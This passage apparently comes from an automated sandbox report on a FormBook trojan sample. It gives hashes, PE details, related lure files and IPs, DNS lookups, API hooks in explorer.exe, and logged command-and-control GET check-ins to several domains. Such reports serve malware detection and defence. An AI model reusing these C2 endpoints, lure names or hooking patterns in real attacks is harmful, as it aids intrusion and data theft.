	scan of fax 096859.xlsm	Get hash	malicious	Browse	198.12.154.178
	scan of invoice 91510.xlsm	Get hash	malicious	Browse	198.12.154.178
	export of check 684585.xlsm	Get hash	malicious	Browse	198.12.154.178
	SWIFT COPY.exe	Get hash	malicious	Browse	107.180.1.30
	ProForma Invoice 20210510.exe	Get hash	malicious	Browse	184.168.131.241
	PO-UTITECH 0511.exe	Get hash	malicious	Browse	184.168.131.241
	POI09876OIUY.exe	Get hash	malicious	Browse	184.168.131.241
	4si5VtPNTe.exe	Get hash	malicious	Browse	184.168.131.241
	invscan052021.exe	Get hash	malicious	Browse	184.168.131.241
	da.exe	Get hash	malicious	Browse	184.168.131.241
	Payment.xlsx	Get hash	malicious	Browse	184.168.131.241
EGIHOSTINGUS	POI09876OIUY.exe	Get hash	malicious	Browse	45.39.20.158
	invscan052021.exe	Get hash	malicious	Browse	104.252.43.114
	PURCHASE ORDER 5112101.xlsx	Get hash	malicious	Browse	172.252.102.196
	Purchase Order.exe	Get hash	malicious	Browse	45.38.16.182
	WAkePI6vWufG5Bb.exe	Get hash	malicious	Browse	142.111.54.187
	new order.xlsx	Get hash	malicious	Browse	104.252.75.149
	Il nuovo ordine e nell'elenco allegato.exe	Get hash	malicious	Browse	166.88.252.48
	987654OIUYFG.exe	Get hash	malicious	Browse	104.164.224.84
	2B0CsHzr8o.exe	Get hash	malicious	Browse	107.186.80.147
	REVISED ORDER.exe	Get hash	malicious	Browse	107.187.161.189
	NEW ORDER.exe	Get hash	malicious	Browse	45.38.16.182
	new order.exe	Get hash	malicious	Browse	45.39.88.129
	TT.exe	Get hash	malicious	Browse	107.165.149.13
	a3aa510e_by_Libranalysis.exe	Get hash	malicious	Browse	104.252.43.114
	Airwaybill # 6913321715.exe	Get hash	malicious	Browse	107.165.10.98
	PURCHASE ORDER.exe	Get hash	malicious	Browse	45.38.16.182
	DocNo2300058329.doc__.rtf	Get hash	malicious	Browse	104.252.43.114
	Bill Of Lading & Packing List.pdf.gz.exe	Get hash	malicious	Browse	104.252.53.97
	pVrqrGltiL.exe	Get hash	malicious	Browse	50.118.250.118
	PO#10244.exe	Get hash	malicious	Browse	45.39.20.158

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\INv02938727.exe.log Download File
Process:	C:\Users\user\Desktop\INv02938727.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1314
Entropy (8bit):	5.350128552078965
Encrypted:	false
SSDEEP:	24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
MD5:	1DC1A2DCC9EFAA84EABF4F6D6066565B
SHA1:	B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
SHA-256:	28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
SHA-512:	95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.700274057382145
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	INv02938727.exe
File size:	719360
MD5:	a3b74acf9723e53d6caea736faae9708
SHA1:	2714e0ec97d81921312f0db6470dc40f55d16b96
SHA256:	f8e8f64bb17ffb2fea18b7671602a76a8b5734607c7a7ae035dce8eed8381a74
SHA512:	e468c5146e35f8aae5536c7ce6c490b68588af0f71fd5d85d0b1dfe9b1831be55a2d9b8787035fc95e288f41c7ab7c4cf73965d6707bbfbe4685655ffbe4fa6b
SSDEEP:	12288:NMf87gJVpnabp1HiqSpLyDrnsSoo7dbi8kg04kuA9Mu:2UghabSLnwdbi8kg1Ip
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....e.`..............P.................. ........@.. .......................@............@................................

File Icon


Icon Hash:	ae53d212d9ccc4ca

Static PE Info

General
Entrypoint:	0x4afdde
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x60986599 [Sun May 9 22:43:37 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xafd8c	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xb0000	0x1764	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xb2000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xadde4	0xade00	False	0.834349445093	data	7.70994295605	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0xb0000	0x1764	0x1800	False	0.443196614583	data	5.616925312	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xb2000	0xc	0x200	False	0.044921875	data	0.101910425663	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_ICON	0xb0160	0x10a8	dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 4293725196, next used block 4293659660
RT_GROUP_ICON	0xb1208	0x14	data
RT_GROUP_ICON	0xb121c	0x14	data
RT_VERSION	0xb1230	0x348	data
RT_MANIFEST	0xb1578	0x1ea	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright	Copyright MCS 2018
Assembly Version	1.0.0.0
InternalName	SafeHeapHandleCache.exe
FileVersion	1.0.0.0
CompanyName	MCS
LegalTrademarks
Comments
ProductName	Library
ProductVersion	1.0.0.0
FileDescription	Library
OriginalFilename	SafeHeapHandleCache.exe

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
05/12/21-07:32:34.071720	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49723	80	192.168.2.7	34.102.136.180
05/12/21-07:32:34.071720	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49723	80	192.168.2.7	34.102.136.180
05/12/21-07:32:34.071720	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49723	80	192.168.2.7	34.102.136.180
05/12/21-07:32:34.208539	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49723	34.102.136.180	192.168.2.7
05/12/21-07:33:17.629103	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49733	80	192.168.2.7	184.168.131.241
05/12/21-07:33:17.629103	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49733	80	192.168.2.7	184.168.131.241
05/12/21-07:33:17.629103	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49733	80	192.168.2.7	184.168.131.241

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 12, 2021 07:32:34.030286074 CEST	49723	80	192.168.2.7	34.102.136.180
May 12, 2021 07:32:34.071357012 CEST	80	49723	34.102.136.180	192.168.2.7
May 12, 2021 07:32:34.071485996 CEST	49723	80	192.168.2.7	34.102.136.180
May 12, 2021 07:32:34.071719885 CEST	49723	80	192.168.2.7	34.102.136.180
May 12, 2021 07:32:34.112662077 CEST	80	49723	34.102.136.180	192.168.2.7
May 12, 2021 07:32:34.208539009 CEST	80	49723	34.102.136.180	192.168.2.7
May 12, 2021 07:32:34.208564997 CEST	80	49723	34.102.136.180	192.168.2.7
May 12, 2021 07:32:34.208874941 CEST	49723	80	192.168.2.7	34.102.136.180
May 12, 2021 07:32:34.208909988 CEST	49723	80	192.168.2.7	34.102.136.180
May 12, 2021 07:32:34.249890089 CEST	80	49723	34.102.136.180	192.168.2.7
May 12, 2021 07:32:56.528295040 CEST	49732	80	192.168.2.7	107.165.40.251
May 12, 2021 07:32:56.723351955 CEST	80	49732	107.165.40.251	192.168.2.7
May 12, 2021 07:32:56.725675106 CEST	49732	80	192.168.2.7	107.165.40.251
May 12, 2021 07:32:56.725887060 CEST	49732	80	192.168.2.7	107.165.40.251
May 12, 2021 07:32:57.120785952 CEST	80	49732	107.165.40.251	192.168.2.7
May 12, 2021 07:32:57.152642012 CEST	80	49732	107.165.40.251	192.168.2.7
May 12, 2021 07:32:57.153027058 CEST	49732	80	192.168.2.7	107.165.40.251
May 12, 2021 07:32:57.346057892 CEST	80	49732	107.165.40.251	192.168.2.7
May 12, 2021 07:32:57.346165895 CEST	80	49732	107.165.40.251	192.168.2.7
May 12, 2021 07:32:57.346312046 CEST	49732	80	192.168.2.7	107.165.40.251
May 12, 2021 07:33:17.432018042 CEST	49733	80	192.168.2.7	184.168.131.241
May 12, 2021 07:33:17.628640890 CEST	80	49733	184.168.131.241	192.168.2.7
May 12, 2021 07:33:17.628774881 CEST	49733	80	192.168.2.7	184.168.131.241
May 12, 2021 07:33:17.629102945 CEST	49733	80	192.168.2.7	184.168.131.241
May 12, 2021 07:33:17.825490952 CEST	80	49733	184.168.131.241	192.168.2.7
May 12, 2021 07:33:17.924803019 CEST	80	49733	184.168.131.241	192.168.2.7
May 12, 2021 07:33:17.924848080 CEST	80	49733	184.168.131.241	192.168.2.7
May 12, 2021 07:33:17.925142050 CEST	49733	80	192.168.2.7	184.168.131.241
May 12, 2021 07:33:17.925301075 CEST	49733	80	192.168.2.7	184.168.131.241
May 12, 2021 07:33:18.121701956 CEST	80	49733	184.168.131.241	192.168.2.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 12, 2021 07:31:11.253586054 CEST	50848	53	192.168.2.7	8.8.8.8
May 12, 2021 07:31:11.318593979 CEST	53	50848	8.8.8.8	192.168.2.7
May 12, 2021 07:31:11.860301018 CEST	61242	53	192.168.2.7	8.8.8.8
May 12, 2021 07:31:11.912292957 CEST	53	61242	8.8.8.8	192.168.2.7
May 12, 2021 07:31:12.753283024 CEST	58562	53	192.168.2.7	8.8.8.8
May 12, 2021 07:31:12.812706947 CEST	53	58562	8.8.8.8	192.168.2.7
May 12, 2021 07:31:14.106764078 CEST	56590	53	192.168.2.7	8.8.8.8
May 12, 2021 07:31:14.157556057 CEST	53	56590	8.8.8.8	192.168.2.7
May 12, 2021 07:31:15.015471935 CEST	60501	53	192.168.2.7	8.8.8.8
May 12, 2021 07:31:15.067043066 CEST	53	60501	8.8.8.8	192.168.2.7
May 12, 2021 07:31:16.372122049 CEST	53775	53	192.168.2.7	8.8.8.8
May 12, 2021 07:31:16.426413059 CEST	53	53775	8.8.8.8	192.168.2.7
May 12, 2021 07:31:17.717036963 CEST	51837	53	192.168.2.7	8.8.8.8
May 12, 2021 07:31:17.776796103 CEST	53	51837	8.8.8.8	192.168.2.7
May 12, 2021 07:31:19.303694010 CEST	55411	53	192.168.2.7	8.8.8.8
May 12, 2021 07:31:19.352372885 CEST	53	55411	8.8.8.8	192.168.2.7
May 12, 2021 07:31:21.112109900 CEST	63668	53	192.168.2.7	8.8.8.8
May 12, 2021 07:31:21.160839081 CEST	53	63668	8.8.8.8	192.168.2.7
May 12, 2021 07:31:22.597744942 CEST	54640	53	192.168.2.7	8.8.8.8
May 12, 2021 07:31:22.646928072 CEST	53	54640	8.8.8.8	192.168.2.7
May 12, 2021 07:31:24.053947926 CEST	58739	53	192.168.2.7	8.8.8.8
May 12, 2021 07:31:24.105631113 CEST	53	58739	8.8.8.8	192.168.2.7
May 12, 2021 07:31:25.592647076 CEST	60338	53	192.168.2.7	8.8.8.8
May 12, 2021 07:31:25.650290966 CEST	53	60338	8.8.8.8	192.168.2.7
May 12, 2021 07:31:26.529448032 CEST	58717	53	192.168.2.7	8.8.8.8
May 12, 2021 07:31:26.578330040 CEST	53	58717	8.8.8.8	192.168.2.7
May 12, 2021 07:31:27.595426083 CEST	59762	53	192.168.2.7	8.8.8.8
May 12, 2021 07:31:27.647141933 CEST	53	59762	8.8.8.8	192.168.2.7
May 12, 2021 07:31:28.797008038 CEST	54329	53	192.168.2.7	8.8.8.8
May 12, 2021 07:31:28.848330975 CEST	53	54329	8.8.8.8	192.168.2.7
May 12, 2021 07:31:29.983508110 CEST	58052	53	192.168.2.7	8.8.8.8
May 12, 2021 07:31:30.035233021 CEST	53	58052	8.8.8.8	192.168.2.7
May 12, 2021 07:31:31.305459976 CEST	54008	53	192.168.2.7	8.8.8.8
May 12, 2021 07:31:31.364151001 CEST	53	54008	8.8.8.8	192.168.2.7
May 12, 2021 07:31:32.102993965 CEST	59451	53	192.168.2.7	8.8.8.8
May 12, 2021 07:31:32.151689053 CEST	53	59451	8.8.8.8	192.168.2.7
May 12, 2021 07:31:32.323236942 CEST	52914	53	192.168.2.7	8.8.8.8
May 12, 2021 07:31:32.383743048 CEST	53	52914	8.8.8.8	192.168.2.7
May 12, 2021 07:31:33.821563959 CEST	64569	53	192.168.2.7	8.8.8.8
May 12, 2021 07:31:33.871035099 CEST	53	64569	8.8.8.8	192.168.2.7
May 12, 2021 07:31:36.264314890 CEST	52816	53	192.168.2.7	8.8.8.8
May 12, 2021 07:31:36.314393997 CEST	53	52816	8.8.8.8	192.168.2.7
May 12, 2021 07:31:37.413877964 CEST	50781	53	192.168.2.7	8.8.8.8
May 12, 2021 07:31:37.462654114 CEST	53	50781	8.8.8.8	192.168.2.7
May 12, 2021 07:31:41.517299891 CEST	54230	53	192.168.2.7	8.8.8.8
May 12, 2021 07:31:41.567410946 CEST	53	54230	8.8.8.8	192.168.2.7
May 12, 2021 07:31:42.770950079 CEST	54911	53	192.168.2.7	8.8.8.8
May 12, 2021 07:31:42.819693089 CEST	53	54911	8.8.8.8	192.168.2.7
May 12, 2021 07:32:03.805124044 CEST	49958	53	192.168.2.7	8.8.8.8
May 12, 2021 07:32:03.864833117 CEST	53	49958	8.8.8.8	192.168.2.7
May 12, 2021 07:32:07.273396969 CEST	50860	53	192.168.2.7	8.8.8.8
May 12, 2021 07:32:07.322237015 CEST	53	50860	8.8.8.8	192.168.2.7
May 12, 2021 07:32:07.426489115 CEST	50452	53	192.168.2.7	8.8.8.8
May 12, 2021 07:32:07.484920979 CEST	53	50452	8.8.8.8	192.168.2.7
May 12, 2021 07:32:33.959813118 CEST	59730	53	192.168.2.7	8.8.8.8
May 12, 2021 07:32:34.021111012 CEST	53	59730	8.8.8.8	192.168.2.7
May 12, 2021 07:32:41.932732105 CEST	59310	53	192.168.2.7	8.8.8.8
May 12, 2021 07:32:42.001012087 CEST	53	59310	8.8.8.8	192.168.2.7
May 12, 2021 07:32:49.960647106 CEST	51919	53	192.168.2.7	8.8.8.8
May 12, 2021 07:32:50.018819094 CEST	53	51919	8.8.8.8	192.168.2.7
May 12, 2021 07:32:56.455708981 CEST	64296	53	192.168.2.7	8.8.8.8
May 12, 2021 07:32:56.526810884 CEST	53	64296	8.8.8.8	192.168.2.7
May 12, 2021 07:33:17.362968922 CEST	56680	53	192.168.2.7	8.8.8.8
May 12, 2021 07:33:17.430162907 CEST	53	56680	8.8.8.8	192.168.2.7
May 12, 2021 07:33:20.818274975 CEST	58820	53	192.168.2.7	8.8.8.8
May 12, 2021 07:33:20.887164116 CEST	53	58820	8.8.8.8	192.168.2.7
May 12, 2021 07:33:22.883336067 CEST	60983	53	192.168.2.7	8.8.8.8
May 12, 2021 07:33:22.948488951 CEST	53	60983	8.8.8.8	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
May 12, 2021 07:32:33.959813118 CEST	192.168.2.7	8.8.8.8	0x411f	Standard query (0)	www.manifestarz.com	A (IP address)	IN (0x0001)
May 12, 2021 07:32:56.455708981 CEST	192.168.2.7	8.8.8.8	0x7f89	Standard query (0)	www.funtimespheres.com	A (IP address)	IN (0x0001)
May 12, 2021 07:33:17.362968922 CEST	192.168.2.7	8.8.8.8	0x4944	Standard query (0)	www.sequenceanalytica.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
May 12, 2021 07:32:34.021111012 CEST	8.8.8.8	192.168.2.7	0x411f	No error (0)	www.manifestarz.com	manifestarz.com		CNAME (Canonical name)	IN (0x0001)
May 12, 2021 07:32:34.021111012 CEST	8.8.8.8	192.168.2.7	0x411f	No error (0)	manifestarz.com		34.102.136.180	A (IP address)	IN (0x0001)
May 12, 2021 07:32:56.526810884 CEST	8.8.8.8	192.168.2.7	0x7f89	No error (0)	www.funtimespheres.com		107.165.40.251	A (IP address)	IN (0x0001)
May 12, 2021 07:33:17.430162907 CEST	8.8.8.8	192.168.2.7	0x4944	No error (0)	www.sequenceanalytica.com	sequenceanalytica.com		CNAME (Canonical name)	IN (0x0001)
May 12, 2021 07:33:17.430162907 CEST	8.8.8.8	192.168.2.7	0x4944	No error (0)	sequenceanalytica.com		184.168.131.241	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.manifestarz.com

www.funtimespheres.com

www.sequenceanalytica.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.7	49723	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 12, 2021 07:32:34.071719885 CEST	1486	OUT	GET /kkt/?n8=WT801LO0&ItLd=YJq3LfF57r8Qfq7uTCgZxOPP1vMH1/e9D5ir0WlXFDknegtt717KVO1lFmJGJc9BoYXzy139hQ== HTTP/1.1 Host: www.manifestarz.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
May 12, 2021 07:32:34.208539009 CEST	1486	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Wed, 12 May 2021 05:32:34 GMT Content-Type: text/html Content-Length: 275 ETag: "60995c0c-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.7	49732	107.165.40.251	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 12, 2021 07:32:56.725887060 CEST	5426	OUT	GET /kkt/?ItLd=mESCp8fUWMf2GiNccZQr41WoLlunmDO2dTTww9D/7e3BTia5ZniOyGA6Z4qikYh0oIJWnb//TQ==&n8=WT801LO0 HTTP/1.1 Host: www.funtimespheres.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
May 12, 2021 07:32:57.152642012 CEST	5427	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 12 May 2021 13:33:02 GMT Content-Type: text/html Content-Length: 355 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 20 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 d2 b3 c3 e6 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 20 75 72 6c 3d 2f 22 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /><title>404</title></head><body><meta http-equiv="refresh" content="0; url=/"></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.7	49733	184.168.131.241	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 12, 2021 07:33:17.629102945 CEST	5429	OUT	GET /kkt/?n8=WT801LO0&ItLd=beAPPUpQq3bTf0wVpdVGLtZQUj/Y58U/IZEW6sslvUZTyjBteEnfLFfdWI9VdBzisWFD4iTcDg== HTTP/1.1 Host: www.sequenceanalytica.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
May 12, 2021 07:33:17.924803019 CEST	5429	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.16.1 Date: Wed, 12 May 2021 05:33:17 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Location: http://mindcart.ai/kkt/?n8=WT801LO0&ItLd=beAPPUpQq3bTf0wVpdVGLtZQUj/Y58U/IZEW6sslvUZTyjBteEnfLFfdWI9VdBzisWFD4iTcDg== Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
PeekMessageA	INLINE	explorer.exe
PeekMessageW	INLINE	explorer.exe
GetMessageW	INLINE	explorer.exe
GetMessageA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: user32.dll

Function Name	Hook Type	New Data
PeekMessageA	INLINE	0x48 0x8B 0xB8 0x87 0x7E 0xE6
PeekMessageW	INLINE	0x48 0x8B 0xB8 0x8F 0xFE 0xE6
GetMessageW	INLINE	0x48 0x8B 0xB8 0x8F 0xFE 0xE6
GetMessageA	INLINE	0x48 0x8B 0xB8 0x87 0x7E 0xE6

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: INv02938727.exe PID: 4852 Parent PID: 5796

General

Start time:	07:31:19
Start date:	12/05/2021
Path:	C:\Users\user\Desktop\INv02938727.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\INv02938727.exe'
Imagebase:	0xd0000
File size:	719360 bytes
